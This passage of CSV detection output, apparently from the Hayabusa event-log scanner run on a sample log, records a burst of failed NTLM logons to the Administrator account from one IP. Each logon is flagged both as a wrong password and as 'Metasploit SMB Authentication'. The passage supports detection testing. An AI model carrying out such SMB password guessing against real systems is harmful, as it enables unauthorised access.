Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 